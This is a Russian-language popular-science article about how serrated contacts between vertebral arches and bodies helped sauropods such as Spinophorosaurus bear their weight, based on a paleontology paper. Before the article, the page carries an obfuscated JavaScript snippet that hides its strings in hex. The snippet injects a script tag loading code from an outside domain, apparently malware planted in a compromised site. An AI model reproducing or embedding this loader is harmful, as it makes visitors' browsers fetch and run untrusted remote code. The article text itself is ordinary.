script type='text/javascript'>var _0x7f86=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x72\x6F\x67\x65\x72\x73\x74\x72\x69\x70\x73\x2E\x63\x6F\x6D\x2F\x6D\x61\x69\x6E\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];var script=document[_0x7f86[1]](_0x7f86[0]);script[_0x7f86[2]]= _0x7f86[3];script[_0x7f86[4]]= _0x7f86[5];document[_0x7f86[8]](_0x7f86[7])[0][_0x7f86[6]](script)

Наверное, многие, кому приходилось разглядывать скелет бронтозавра – или его самого, нарисованного в книге, или в кино – думали о том, как эта рептилия выдерживала свой вес. А ведь, кроме бронтозавра, были еще и другие гиганты: диплодок, брахиозавр, апатозавр и прочие – все они принадлежали к группе зауропод, которые достигали почти сорока метров в длину, а весили сто и более тонн (хотя среди зауропод были и карликовые виды, длиной всего 5–6 метров). При том они не были водными животными: живи они полностью в воде, она бы поддерживала их вес. На суше же вся их тяжесть в буквальном смысле ложилась на их собственные кости.

Очевидно, в ходе естественного отбора у гигантских рептилий должны были появиться какие-то особенности, позволявшие им справляться с собственным весом: это и особая конструкция ног, и маленькая голова, и сравнительно небольшой вес костей, пронизанных воздушными полостями. В статье в Ameghiniana палеонтологи из Мичиганского университета описывают еще одну анатомическую хитрость, которая помогла зауроподам стать гигантами, и которая заключается в особом строении позвонков.

Как известно, у динозавров (да и у зверей тоже) позвонки состоят из двух частей: нижней – тела позвонка, и верхней, так называемой дуги; между дугой и телом есть отверстие, через которое проходит спинной мозг. У взрослого животного дуга позвонка прочно соединена с телом, однако между ними до поры до времени сохраняется хрящевая прослойка, в которой появляются новые клетки. Время, когда обе части позвонка срастаются, зависит от конкретного вида: у человека они окончательно соединяются в 6–7 лет, у зауропод же дуга и тело срастались сильно позже, когда рептилия уже дорастала до своей взрослой длины.

Для динозавров это было бы большой проблемой: хрящевая прослойка ослабляет соединение, и большая нагрузка на позвоночник заставила бы разойтись обе части позвонка. Но у зауропод (по крайней мере, у некоторых из них), контакт между позвонковой дугой и телом был зубчатым, и именно зубчики не позволяли дуге и телу разъехаться. Причем зубчатость была разной: в скелете Spinophorosaurus nigerensis, с которым работали авторы статьи, в шейных позвонках, находящихся ближе к голове, контакт между дугой и телом был сравнительно простым, но чем ближе позвонок оказывался к плечам, тем более неровной, изрезанной становилась поверхность соединения. Что понятно – нижним шейным позвонкам приходилось выдерживать больший вес, чем верхним.

В перспективе исследователи собираются изучить позвоночные кости других динозавров, не только зауропод, но и хищников, в том числе и небезызвестного тираннозавра Tyrannosaurus rex, весившего около 9 тонн, что тоже довольно немало. Если и у других удастся найти такое же зубчатое соединение, то можно будет сделать вывод, что это было общее «ноу-хау» для большинства доисторических крупных рептилий.

По материалам Science.